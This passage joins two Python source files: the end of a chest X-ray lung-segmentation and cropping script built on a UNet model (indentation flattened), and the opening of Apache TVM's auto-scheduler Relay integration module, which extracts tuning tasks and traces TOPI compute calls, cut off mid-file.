        out_pad_size (int): the number of pixels padded outside of the bounding
box.
k_size (int): the size of the opencv morphological kernel.
Returns:
denoised (array): a binary mask generated from the connected areas.
bbox (array): the coordinates of the lung region bounding box.
spine_pos (int): the position of the spine.
"""
opened = cv2.morphologyEx(pred, cv2.MORPH_OPEN, kernel = np.ones((k_size, k_size)))
cnt, label_map, stats, centriods = cv2.connectedComponentsWithStats(opened)
# index sorted by area, from large to small, first one is the background
idx_sorted = np.argsort(stats[:, cv2.CC_STAT_AREA])[::-1]
stats = stats[idx_sorted]
# remove small connected region
if debug:
print(stats)
stats = stats[stats[:, cv2.CC_STAT_AREA] > cut_thresh * np.prod(pred.shape)]
denoised = np.zeros(opened.shape, dtype = np.uint8)
for i in range(1, min(stats.shape[0], 3)):
denoised[label_map == idx_sorted[i]] = 255
spine_pos = select_spine(resized_raw)
if stats.shape[0] < 3:
if stats.shape[0] == 1:
print(filename + ' No large enough area Detected!!!')
return denoised, None, spine_pos
else:
print(filename + ' Single Lung Detected !!!')
top = stats[1, cv2.CC_STAT_TOP]
bottom = stats[1, cv2.CC_STAT_TOP] + stats[1, cv2.CC_STAT_HEIGHT]
left = stats[1, cv2.CC_STAT_LEFT]
right = stats[1, cv2.CC_STAT_LEFT] + stats[1, cv2.CC_STAT_WIDTH]
left_mirror = mirror(spine_pos, left)
right_mirror = mirror(spine_pos, right)
left = min(left, right_mirror)
right = max(right, left_mirror)
else:
left = min(stats[1, cv2.CC_STAT_LEFT], stats[2, cv2.CC_STAT_LEFT])
top = min(stats[1, cv2.CC_STAT_TOP], stats[2, cv2.CC_STAT_TOP])
right = max(
stats[1, cv2.CC_STAT_LEFT] + stats[1, cv2.CC_STAT_WIDTH],
stats[2, cv2.CC_STAT_LEFT] + stats[2, cv2.CC_STAT_WIDTH]
)
bottom = max(
stats[1, cv2.CC_STAT_TOP] + stats[1, cv2.CC_STAT_HEIGHT],
stats[2, cv2.CC_STAT_TOP] + stats[2, cv2.CC_STAT_HEIGHT]
)
chunk1_side = left_right(label_map, 1, spine_pos)
chunk2_side = left_right(label_map, 2, spine_pos)
# print('chunk1 on' + chunk1_side + ' chunk2 on ' + chunk2_side)
if chunk1_side == chunk2_side:
print(filename + ' two chunks on the same side!!!')
left_mirror = mirror(spine_pos, left)
right_mirror = mirror(spine_pos, right)
left = min(left, right_mirror)
right = max(right, left_mirror)
bbox = np.array([left, top, right, bottom])
bbox = out_pad(bbox, denoised.shape, out_pad_size)
# boxed = cv2.rectangle(denoised, (bbox[0], bbox[1]), (bbox[2], bbox[3]), color = 255, thickness=3)
# return denoised, bbox, denoised_no_bbox, raw_bbox
return denoised, bbox, spine_pos
def out_pad(bbox_in, shape, out_pad_size):
"""
This function adds padding outside of the bounding box.
Parameters:
bbox_in (array): the array that contains the coordinates of the bounding
box for the lung region.
        shape (array): the shape of the image/mask containing the bounding box,
        used to keep the padded box within the image bounds.
out_pad_size (int): the number of pixels to be padded outside of the bounding
box.
Returns:
bbox_padded (array): the array that contains the coordinates of the padded
bounding box.
"""
left, top, right, bottom = bbox_in
left = max(0, left - out_pad_size)
# right = min(shape[1] - 1, right + out_pad_size)
right = min(shape[1] , right + out_pad_size)
top = max(0, top - out_pad_size)
# bottom = min(shape[0] - 1, bottom + out_pad_size)
bottom = min(shape[0], bottom + out_pad_size)
bbox_padded = np.array([left, top, right, bottom])
return bbox_padded
def square_helper(start, finish, expand1, expand2, size_limit):
"""
This function can expand one axis of the size of the bounding box.
Parameters:
start (int): the coordinate of the start point.
finish (int): the coordinate of the finish point.
expand1 (int): the number of pixels used to expand the starting point.
expand2 (int): the number of pixels used to expand the finishing point.
size_limit (int): the maximum length of this expansion.
Returns:
new_start (int): the coordinate of the expanded start point.
new_finish (int): the coordinate of the expanded finish point.
"""
new_start = max(0, start - expand1)
expand1_rem = expand1 - (start - new_start)
new_finish = min(size_limit , finish + expand2)
expand2_rem = expand2 - (new_finish - finish)
# print('expand1_rem = ', expand1_rem, ' expand2_rem = ', expand2_rem)
if expand1_rem > 0 and expand2_rem == 0:
new_finish = min(size_limit, new_finish + expand1_rem)
elif expand1_rem == 0 and expand2_rem > 0:
new_start = max(0, new_start - expand2_rem)
return new_start, new_finish
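# Worked example: square_helper(10, 50, 5, 5, 256) returns (5, 55); near a border,
# square_helper(2, 50, 5, 5, 256) can only move the start by 2 pixels, so the
# remaining 3 pixels are pushed to the other end, giving (0, 58).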
def square_bbox(img_shape, raw_bbox):
"""
    This function changes the shape of a bounding box to a square.
Parameters:
img_shape (array): the shape of the original image.
raw_bbox (array): the bounding box to be shaped into square.
Returns:
squared_bbox (array): the square bounding box generated from the raw bounding
box.
"""
if raw_bbox is None:
return None
# img_shape = denoised_no_bbox.shape
left, top, right, bottom = raw_bbox
width = right - left
height = bottom - top
center = [round((left + right) / 2), round((top + bottom) / 2)]
diff = abs(width - height)
expand1 = diff // 2
expand2 = diff - expand1
sqaured_bbox = np.copy(raw_bbox)
# print('expand1 = ', expand1, ' expand2 = ', expand2)
if width > height:
new_top, new_bottom = square_helper(top, bottom, expand1, expand2, img_shape[0])
sqaured_bbox = np.array([left, new_top, right, new_bottom])
elif width < height:
new_left, new_right = square_helper(left, right, expand1, expand2, img_shape[1])
sqaured_bbox = np.array([new_left, top, new_right, bottom])
# print('original bounding box:' + str(raw_bbox))
# print('squared bounding box:' + str(sqaured_bbox))
return sqaured_bbox
def bbox_mask_and_crop(raw_img, bbox):
"""
This function crops the original image using the bounding box.
Parameters:
raw_img (array): the original uncropped image.
bbox (array): the bounding box array which contains the coordinates
of the four corners of the box. The bounding box can be shapes other than
square.
Returns:
cropped_img (array): the image cropped out from the original image using
the bounding box.
        bbox (array): the bounding box array which contains the coordinates
of the four corners of the box.
"""
if bbox is None:
return raw_img, bbox
left, top, right, bottom = bbox
cropped_img = raw_img[
top : bottom,
left : right
]
return cropped_img, bbox
def square_crop(raw_img, raw_bbox):
"""
This function crops the original image using a square bounding box generated
from the provided raw bounding box.
Parameters:
raw_img (array): the original uncropped image.
raw_bbox (array): the bounding box which might not be square shaped.
Returns:
bbox_mask_and_crop(raw_img, sqaured_bbox): see the bbox_mask_and_crop function for
more information.
"""
if raw_bbox is None:
return raw_img, raw_bbox
sqaured_bbox = square_bbox(raw_img.shape, raw_bbox)
return bbox_mask_and_crop(raw_img, sqaured_bbox)
def crop_lung(raw_img, cur_shape, bbox):
"""
This function crops out the lung region from the original image using a bounding
box which might not be square shaped.
Parameters:
raw_img (array): the original uncropped image.
cur_shape (array): the desired shape of the image.
bbox (array): the bounding box to the lung region which might not be square
shaped
Returns:
bbox_mask_and_crop(raw_img, raw_bbox): see the bbox_mask_and_crop function for
more information.
"""
if bbox is None:
return raw_img, None
if len(bbox) != 4:
raise ValueError('WRONG length of bounding box')
left, top, right, bottom = bbox
raw_height = raw_img.shape[0]
raw_width = raw_img.shape[1]
cur_height = cur_shape[0]
cur_width = cur_shape[1]
# print('Bounding box = {}'.format(bbox))
# print('raw shape = {}'.format(raw_img.shape))
# print('cur shape = {}'.format(cur_shape))
lung_top = int(round(top / cur_height * raw_height))
lung_bottom = int(round(bottom / cur_height * raw_height))
lung_left = int(round(left / cur_width * raw_width))
lung_right = int(round(right / cur_width * raw_width))
# print('lung left = {} right = {} top = {} bottom = {} '.format(lung_left, lung_right, lung_top, lung_bottom))
lung_img = raw_img[
lung_top : lung_bottom,
lung_left : lung_right
]
# print('lung shape = {}'.format(lung_img.shape))
raw_bbox = np.array([lung_left, lung_top, lung_right, lung_bottom])
return bbox_mask_and_crop(raw_img, raw_bbox)
def pretty(filename, char_per_line):
return '\n'.join(filename[i : i + char_per_line] for i in range(0, len(filename), char_per_line))
def single_img_crop(img, resized_raw_img, raw_img, file_path, UNet, result_folder,
im_shape = (256, 256), cut_thresh = 0.02, out_pad_size = 8, debug_folder = None , debugging = False):
'''
Crop out the lung area from CXR for single images\n
lung prediction based on UNet
Parameters
----------
img : np array
acceptable shape: (n, x, x, 1), (n, x, x), (x, x, 1), (x, x)
where n is the number of images; x is the input_shape, by default 256
resized_raw_img : np array
raw sized image, with shape of (x, x);
see load_CXR_from_list for details
raw_img : np array
original raw image;
see load_CXR_from_list for details
UNet: loaded UNet model from https://github.com/imlab-uiip/lung-segmentation-2d
path to UNet
    result_folder : preferably pathlib object
path to output
im_shape : tuple
specify the input image shape of UNet, by default (256, 256)
cut_thresh: float
connected components less than cut_thresh * np.prod(im_shape) will be removed
out_pad_size: int
Default to be 8, how many pixels to enlarge the bounding box.
    debug_folder : preferably pathlib object
path to debug images; if not specified, no debug images will be written to local
debugging: bool
Default to be false. If true, will plot debugging images to screen instead of saving to local.
Returns
----------
lung_img : np array
cropped lung area (not neccessarily squared)
lung_img_squared :
cropped lung area (squared if possible)
'''
# we need (n, x, x, 1) format for input of Unet
# n is the number of images
# x is the input shape, by default 256
if len(img.shape) == 4 and img.shape[1: -1] == im_shape and img.shape[-1] == 1:
# format (n, x, x, 1)
pass
elif len(img.shape) == 2 and img.shape == im_shape:
# format (x, x)
img = np.expand_dims(img, axis = (0, -1))
elif len(img.shape) == 3 and img.shape[:2] == im_shape and img.shape[-1] == 1:
# format (x, x, 1)
img = np.expand_dims(img, axis = 0)
elif len(img.shape) == 3 and img.shape[1:] == im_shape:
# format (n, x, x)
img = np.expand_dims(img, axis = -1)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
if not (debug_folder is None) or debugging:
fig, axes = plt.subplots(2, 2, figsize = (8, 8))
fig2, axes2 = plt.subplots(1, 3, figsize = (18, 6))
pred = np.squeeze(UNet.predict(img))
pr = (pred > 0.5).astype(np.uint8)
    if file_path is not None:
filename = file_path.stem
suffix = file_path.suffix
print('outputting result for ' + filename)
denoised, raw_bbox, spine_pos = select_lung(pr, resized_raw_img, cut_thresh = cut_thresh, debug = debugging, filename = filename, out_pad_size = out_pad_size)
# denoised_sqaured, sqaured_bbox = square_bbox(denoised_no_bbox, raw_bbox)
lung_img, nonSquared_bbox = crop_lung(raw_img, im_shape, raw_bbox)
lung_img_squared, sqaured_bbox = square_crop(raw_img, nonSquared_bbox)
lung_img = util.img_as_ubyte(lung_img)
lung_img_squared = util.img_as_ubyte(lung_img_squared)
if not (debug_folder is None) or debugging:
axes[0, 0].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_resized_raw')
axes[0, 0].imshow(resized_raw_img, cmap='gray')
axes[0, 0].set_axis_off()
axes[1, 0].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_rawpred')
axes[1, 0].imshow(pr ,cmap='gray')
axes[1, 0].set_axis_off()
axes[0, 1].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_denoised_pred')
axes[0, 1].imshow(denoised, cmap='gray')
axes[0, 1].set_axis_off()
axes[1, 1].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_denoised_masked')
area_masked = masked(resized_raw_img, denoised, alpha = 0.6)
bbox_drawn = draw_bbox(area_masked, raw_bbox)
spine_drawn = draw_spine(bbox_drawn, spine_pos)
axes[1, 1].imshow(spine_drawn)
axes[1, 1].set_axis_off()
fig.tight_layout()
axes2[0].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'raw_img')
axes2[0].imshow(raw_img, cmap='gray')
# axes2[0].set_axis_off()
        axes2[1].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'unsquared_bounding_box' + '\n' + str(nonSquared_bbox))
        axes2[1].imshow(draw_bbox(raw_img, nonSquared_bbox))
        # axes2[1].set_axis_off()
        axes2[2].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'squared_bounding_box'+ '\n' + str(sqaured_bbox))
axes2[2].imshow(draw_bbox(raw_img, sqaured_bbox))
fig.tight_layout()
if debugging:
plt.show()
elif not (debug_folder is None):
out_path = debug_folder.joinpath(filename + '_debug_resized_scale' + suffix)
fig.savefig(str(out_path))
out_path = debug_folder.joinpath(filename + '_debug_rawscale' + suffix)
fig2.savefig(str(out_path))
if not debugging:
        if result_folder is not None:
result_sub = result_folder.joinpath('crop')
result_sub.mkdir(parents=True, exist_ok=True)
out_path = result_sub.joinpath(filename + '_crop' + suffix)
io.imsave(str(out_path), lung_img )
result_sub = result_folder.joinpath('crop_squared')
result_sub.mkdir(parents=True, exist_ok=True)
out_path = result_sub.joinpath(filename + '_crop_squared' + suffix)
io.imsave(str(out_path), lung_img_squared )
if not (debug_folder is None) or debugging:
plt.close(fig)
plt.close(fig2)
return lung_img, lung_img_squared
def lungseg_fromdata(X, resized_raw, raw_images, file_paths, UNet, result_folder,
im_shape = (256, 256), cut_thresh = 0.02, out_pad_size = 8, debug_folder = None ,debugging = False):
'''
Crop out the lung area from CXR for a set of images.
lung prediction based on UNet
Parameters
----------
img : np array
acceptable shape: (n, x, x, 1), (n, x, x), (x, x, 1), (x, x)
where n is the number of images; x is the input_shape, by default 256
resized_raw_img : np array
raw sized image, with shape of (x, x);
see load_CXR_from_list for details
raw_img : np array
original raw image;
see load_CXR_from_list for details
UNet: loaded UNet model from https://github.com/imlab-uiip/lung-segmentation-2d
path to UNet
    result_folder : preferably pathlib object
path to output
im_shape : tuple
specify the input image shape of UNet, by default (256, 256)
cut_thresh: float
connected components less than cut_thresh * np.prod(im_shape) will be removed
out_pad_size: int
Default to be 8, how many pixels to enlarge the bounding box.
    debug_folder : preferably pathlib object
path to debug images; if not specified, no debug images will be written to local
debugging: bool
Default to be false. If true, will plot debugging images to screen instead of saving to local.
'''
# tf.debugging.set_log_device_placement(True)
# print("Num GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU')))
# with tf.device('/GPU:0'):
n_test = X.shape[0]
inp_shape = X[0].shape
UNet = load_model(UNet, compile=False)
print('n_test = {}'.format(n_test))
# For inference standard keras ImageGenerator can be used.
test_gen = ImageDataGenerator(rescale=1.)
i = 0
for xx in test_gen.flow(X, batch_size=1, shuffle=False):
single_img_crop(
img = xx,
resized_raw_img = resized_raw[i],
raw_img = raw_images[i],
file_path = file_paths[i],
UNet = UNet,
result_folder = result_folder,
im_shape = im_shape,
cut_thresh = cut_thresh,
out_pad_size = out_pad_size,
debug_folder = debug_folder,
debugging = debugging
)
i += 1
if i == n_test:
break
print('Thread done')
def gen_idx(length, k_fold):
idxs = np.array([length // k_fold] * k_fold)
idxs[:length % k_fold] = idxs[:length % k_fold] + 1
start_points = np.cumsum(idxs)
start_points = [0] + list(start_points)
return start_points
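# Example: gen_idx(10, 3) splits 10 items into chunks of sizes [4, 3, 3] and
# returns the slice boundaries [0, 4, 7, 10], which the caller uses as
# filenames[start_idxs[k]:start_idxs[k + 1]] for each process.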
def adjust_process_num(length):
if length < 20:
k_fold = 1
elif length < 100:
k_fold = 4
elif length < 400:
k_fold = 8
elif length < 1000:
k_fold = 16
else:
k_fold = 24
return k_fold
def lungseg_one_process(result_folder, UNet, filenames,
im_shape = (256, 256), debug_folder = None, cut_thresh = 0.02, out_pad_size = 8, debug = False):
X, resized_raw, raw_images = load_CXR_from_list(filenames, im_shape)
print('X shape = ', X.shape)
lungseg_fromdata(X, resized_raw, raw_images, filenames, UNet, result_folder,
im_shape = im_shape, cut_thresh = cut_thresh, out_pad_size = out_pad_size, debug_folder = debug_folder, debugging = debug)
def singlefolder_lungseg(data_path, result_folder, UNet, debug_folder = None, k_fold = None, cut_thresh = 0.02, out_pad_size = 8, debug = False, filenames = None):
'''
Crop out the lung area from CXR\n
lung prediction based on UNet: https://github.com/imlab-uiip/lung-segmentation-2d
Parameters
----------
    data_path : preferably pathlib object
        all images in that path will be loaded for lung segmentation if filenames not specified.
    result_folder : preferably pathlib object
        path to output
    UNet: preferably pathlib object
        path to UNet
    debug_folder : preferably pathlib object
        path to debug images; if not specified, no debug images will be written to local
k_fold: int
Specify how many processes to create to finish this task.
If None, processes are created based on adjust_process_num function
cut_thresh: float
connected components less than cut_thresh * np.prod(im_shape) will be removed
out_pad_size: int
Default to be 8, how many pixels to enlarge the bounding box.
debug: bool
Default to be false. If true, will plot debugging images to screen instead of saving to local.
filenames: list
If specified, load these images instead of loading all images in data_path.
Absolute paths needed.
'''
data_path = pathlib.Path(data_path)
result_folder = pathlib.Path(result_folder)
result_folder.mkdir(parents=True, exist_ok=True)
if not debug_folder is None:
debug_folder = pathlib.Path(debug_folder)
debug_folder.mkdir(parents=True, exist_ok=True)
im_shape = (256, 256)
chunknum = 0
chunksize = 500
print('processing data in ' + str(data_path))
if filenames is None:
filenames = list(data_path.glob('*'))
totalfiles = len(filenames)
while chunknum * chunksize < totalfiles:
start = chunknum * chunksize
end = min(totalfiles, (chunknum + 1) * chunksize)
print('segmenting {} files of folder {}'.format((start, end), str(data_path)))
curfiles = filenames[start : end]
if debug:
lungseg_one_process(result_folder, UNet, curfiles,
im_shape = im_shape, debug_folder = debug_folder, cut_thresh = cut_thresh, out_pad_size = out_pad_size, debug = debug)
return
start_time = time.time()
keywords = {
'im_shape' : im_shape,
'cut_thresh' : cut_thresh,
'out_pad_size' : out_pad_size,
'debug_folder' : debug_folder,
'debug' : debug
}
if k_fold is None:
k_fold = adjust_process_num(len(curfiles))
print('Running using {} process'.format(k_fold))
start_idxs = gen_idx(len(curfiles), k_fold)
pool = []
for k in range(k_fold):
# attention here the slicing is wrong!!
            # we missed the last few images
arg_str = (
result_folder,
UNet,
curfiles[start_idxs[k]: start_idxs[k + 1]]
)
p = multiprocessing.Process(target = lungseg_one_process, args = arg_str, kwargs = keywords)
p.start()
pool.append(p)
for p in pool:
p.join()
print('{} processes takes {} seconds'.format(k_fold, time.time() - start_time))
chunknum = chunknum + 1
def genlist(data_path_list, list_dict):
cur_dict = list_dict
for i in range(len(data_path_list)):
if i > 0:
cur_dict = cur_dict[data_path_list[i]]
# print(cur_dict)
if type(cur_dict) == list:
return cur_dict
if __name__ == '__main__':
"""
This is the main function of the script. A set of chest x-rays can be cropped
here.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--folder', type=str, help = 'the directory of the image folder')
parser.add_argument('-U', '--Unet', type = str, help = 'the directory of the saved Unet weights')
parser.add_argument('-o', '--output', type = str, help = 'the directory of the resized image')
args = parser.parse_args()
UNet_path = args.Unet
folder_path = os.path.normpath(args.folder)
output_path = os.path.normpath(args.output)
if not os.path.isdir(folder_path):
containing_folder = os.path.dirname(folder_path)
singlefolder_lungseg(containing_folder, output_path, UNet_path, out_pad_size=8, debug=False, filenames=[pathlib.Path(folder_path)])
else:
singlefolder_lungseg(folder_path, output_path, UNet_path, out_pad_size=8, debug=False)
print('Completed!')
# # single image lung segmentation
# from keras.models import load_model
# parent_path = pathlib.Path(__file__).absolute().parent
# data_path = parent_path.parent.joinpath('NMHFiles_sample', 'Negative')
# img_path = data_path.joinpath('8356_47cfe01e37c2237dd6a31b424473c89f_AP_2.png')
# UNet = load_model(UNet_path)
# im_shape = (256, 256)
# X, resized_raw, raw_images = load_CXR_from_list([img_path], im_shape)
# result_folder = parent_path.parent.joinpath('NMHFiles_sample_crop', 'Negative')
# single_img_crop(X[0], resized_raw[0], raw_images[0], img_path, UNet, result_folder, debugging = True)
# print('Total time = {}'.format(time.time() - start))
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import json
import logging
import threading
import tvm
from tvm import autotvm, transform
from tvm.ir.transform import PassContext
from tvm.runtime import convert_to_object
from tvm.target import Target
from tvm.te.tensor import ComputeOp, PlaceholderOp, Tensor
from tvm.tir import Reduce
from tvm.tir import expr as _expr
from . import _ffi_api
from .compute_dag import ComputeDAG, LayoutRewriteOption
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .utils import get_const_tuple
from .workload_registry import register_workload_tensors
logger = logging.getLogger("auto_scheduler")
def call_all_topi_funcs(mod, params, target, opt_level=3):
"""Call all TOPI compute to extract auto_scheduler tasks in a Relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
# Turn off AutoTVM config not found warnings
old_autotvm_silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
with transform.PassContext(
opt_level=opt_level,
config={
"relay.backend.use_auto_scheduler": True,
"relay.backend.disable_compile_engine_cache": True,
},
disabled_pass={"AutoSchedulerLayoutRewrite"},
):
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
mod = tvm.IRModule.from_expr(mod) if isinstance(mod, relay.Function) else mod
compiler.lower(mod, target)
autotvm.GLOBAL_SCOPE.silent = old_autotvm_silent
def extract_tasks(
mod,
params,
target,
target_host=None,
hardware_params=None,
include_simple_tasks=False,
dump_workload_to_dag_log=None,
opt_level=3,
):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
include_simple_tasks: bool
Whether to extract simple tasks that do not include complicated ops.
dump_workload_to_dag_log: Optional[str]
A file to dump an association between the workload keys and the actual DAG
opt_level : Optional[int]
The optimization level of the task extractions.
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
target, target_host = Target.check_and_update_host_consist(target, target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(
TracingMode.EXTRACT_TASK if include_simple_tasks else TracingMode.EXTRACT_COMPLEX_TASK_ONLY
)
dispatch_ctx = DispatchContext.current
old_verbose = dispatch_ctx.verbose
dispatch_ctx.verbose = 0
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(
target=call_all_topi_funcs, args=(mod, params, target, opt_level)
)
build_thread.start()
build_thread.join()
dispatch_ctx.verbose = old_verbose
# create search tasks
tasks = []
weights = []
for wkl_key, (weight, func_names) in env.wkl_key_to_weight.items():
tasks.append(
SearchTask(
workload_key=wkl_key,
target=target,
hardware_params=hardware_params,
# When auto scheduler is used in end to end network, try to apply layout rewrite
# to improve the overall performance
layout_rewrite_option=LayoutRewriteOption.get_target_default(target, True),
task_inputs=(
env.wkl_key_to_input_names[wkl_key]
if wkl_key in env.wkl_key_to_input_names
else None
),
task_inputs_save_to_file=True,
desc=",".join(func_names),
)
)
weights.append(int(weight))
if dump_workload_to_dag_log is not None:
with open(dump_workload_to_dag_log, "w") as f:
json.dump({task.workload_key: str(task.compute_dag) for task in tasks}, f)
return tasks, weights
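# Typical use (a minimal sketch with an illustrative model and target, following
# the TVM auto-scheduler tutorials):
#   from tvm import relay
#   mod, params = relay.testing.resnet.get_workload(num_layers=18, batch_size=1)
#   tasks, task_weights = extract_tasks(mod["main"], params, "llvm")
#   for task, weight in zip(tasks, task_weights):
#       print(task.workload_key, weight)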
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
EXTRACT_COMPLEX_TASK_ONLY = 1 # same as EXTRACT_TASK but ignore the task without complex ops
PREPARE_LAYOUT_REWRITE = 2 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.func_name_to_wkl_key = {}
self.wkl_key_to_weight = {}
self.wkl_key_to_input_names = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, func_name, workload_key):
"""Add the workload key of a search task.
Parameters
----------
func_name: str
The function name of the task.
workload_key: str
The workload key of a task.
"""
self.func_name_to_wkl_key[func_name] = workload_key
if workload_key not in self.wkl_key_to_weight:
self.wkl_key_to_weight[workload_key] = (0, set())
weight, func_names = self.wkl_key_to_weight[workload_key]
func_names.add(func_name)
self.wkl_key_to_weight[workload_key] = (weight + 1, func_names)
def add_workload_input_names(self, workload_key, input_names):
"""Add special task inputs to this workload.
Parameters
----------
workload_key : str
The workload key of a task.
input_names : List[str]
A list of input names.
"""
self.wkl_key_to_input_names[workload_key] = input_names
@tvm._ffi.register_func("auto_scheduler.enter_layout_rewrite")
def enter_layout_rewrite():
"""Enter layout rewrite tracing environment"""
env = TracingEnvironment(TracingMode.PREPARE_LAYOUT_REWRITE)
env.__enter__()
@tvm._ffi.register_func("auto_scheduler.exit_layout_rewrite")
def exit_layout_rewrite():
"""Exit layout rewrite tracing environment"""
env = TracingEnvironment.current
env.__exit__(None, None, None)
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get input/output tensors and
other useful information.
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors with static shape
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
has_complex_op: bool
Whether the topi compute function includes at least one complex (reduce) op
"""
layout_free_ops = []
inputs = []
has_complex_op = False
visited = set()
def traverse(t):
nonlocal has_complex_op
# We cannot directly add tensors to the set, because the comparison of
# two tensors with ndim=0 is ambiguous.
assert t.handle is not None
if t.handle.value in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
has_complex_op = has_complex_op or any([isinstance(e, Reduce) for e in t.op.body])
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t.handle.value)
for t in outs:
traverse(t)
io_tensors = inputs + list(outs)
for tensor in io_tensors:
# Reject the compute if any of its I/O tensors has dynamic shape.
if any([not isinstance(v, int) for v in get_const_tuple(tensor.shape)]):
return ([], False, False)
return (io_tensors, len(layout_free_ops) > 0, has_complex_op)
@tvm._ffi.register_func("auto_scheduler.relay_integration.auto_schedule_topi_compute")
def auto_schedule_topi(func_name, outs):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
func_name: str
The name of the function being scheduled.
outs: List[Tensor]
The output tensors of topi compute functions
Returns
-------
sch: Optional[te.Schedule]
A tuned schedule or none (if not tuned) in the final build mode;
None in the tracing mode so that the fallback topi schedule will be used.
"""
# pylint: disable=import-outside-toplevel
from tvm.auto_scheduler.measure import (
prepare_input_map,
) # lazily import to avoid recursive dependency
io_tensors, has_layout_free, has_complex_op = traverse_to_get_io_tensors(outs)
if not io_tensors: # The compute includes dynamic shapes which are not supported yet.
return None
try:
dag = ComputeDAG(io_tensors)
except tvm.error.TVMError as err:
logger.info("Failed to create a ComputeDAG for auto_scheduler: %s", str(err))
return None
key = register_workload_tensors(dag.workload_key(), io_tensors)
target = tvm.target.Target.current()
dispatch_ctx = DispatchContext.current
state = dispatch_ctx.query(target, key, has_complex_op, dag, func_name)
schedule = None
env = TracingEnvironment.current
if env is None:
# in the final build mode
if state is None:
return None
schedule, _ = dag.apply_steps_from_state(state)
return schedule
if env.tracing_mode in [TracingMode.EXTRACT_TASK, TracingMode.EXTRACT_COMPLEX_TASK_ONLY]:
# in the task extraction mode
if has_complex_op or env.tracing_mode == TracingMode.EXTRACT_TASK:
env.add_workload_key(func_name, key)
input_map = prepare_input_map(io_tensors)
if input_map:
env.add_workload_input_names(key, list(input_map.values()))
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# in prepare_layout_rewrite mode
if (
LayoutRewriteOption.get_target_default(target, True) != LayoutRewriteOption.NO_REWRITE
and has_layout_free
):
if state is None:
return None
# rewrite the layout and update the context for the new dag
new_dag = dag.rewrite_layout_from_state(state)
new_key = new_dag.workload_key()
if new_key != key:
dispatch_ctx.update(target, new_key, state)
else:
        raise ValueError("Invalid tracing mode: " + str(env.tracing_mode))
return schedule
@tvm._ffi.register_func("auto_scheduler.relay_integration.te_compiler_update_weights")
def te_compiler_update_weights(function_weights):
"""A callback for updating the weights of extracted tasks. When using the TE compiler
that avoids compiling the same function multiple times by caching, all extracted tasks
have weight 1, so the TE compiler invokes this callback at the end. In this case,
we override existing weights with the use_count in TE compiler cache.
Parameters
----------
function_weights: Dict[str, int]
Mapping from function names to their weights.
"""
env = TracingEnvironment.current
if env is not None:
# Override this map with the weights in the TE compiler.
env.wkl_key_to_weight = {}
for func_name, weight in function_weights.items():
# If the function name is not in the map, then it means we are not interested in
# this function during task extraction (e.g., a function without reduction).
if func_name not in env.func_name_to_wkl_key:
continue
workload_key = env.func_name_to_wkl_key[func_name]
if workload_key not in env.wkl_key_to_weight:
env.wkl_key_to_weight[workload_key] = (0, set())
# Note that the function appears multiple times in a model will be renamed
# to make sure function names are unique, so we use the workload key generated
# from the function's TE compute to determine their weights.
old_weight, func_names = env.wkl_key_to_weight[workload_key]
func_names.add(func_name)
env.wkl_key_to_weight[workload_key] = (old_weight + weight, func_names)
def tensor_no_check_call(self, *indices):
"""An indexing function without any check.
This is the same as `tvm.te.Tensor::__call__` except that the safety
check is removed.
"""
indices = convert_to_object(indices)
args = []
for x in indices:
if isinstance(x, _expr.PrimExpr):
args.append(x)
elif isinstance(x, _expr.IterVar):
args.append(x.var)
else:
raise ValueError("The indices must be expression")
return _expr.ProducerLoad(self, args)
def remove_index_check(tensor):
